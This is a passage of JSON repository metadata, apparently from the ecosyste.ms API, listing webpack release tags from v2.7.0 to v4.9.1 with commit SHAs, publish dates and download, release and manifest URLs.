bpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82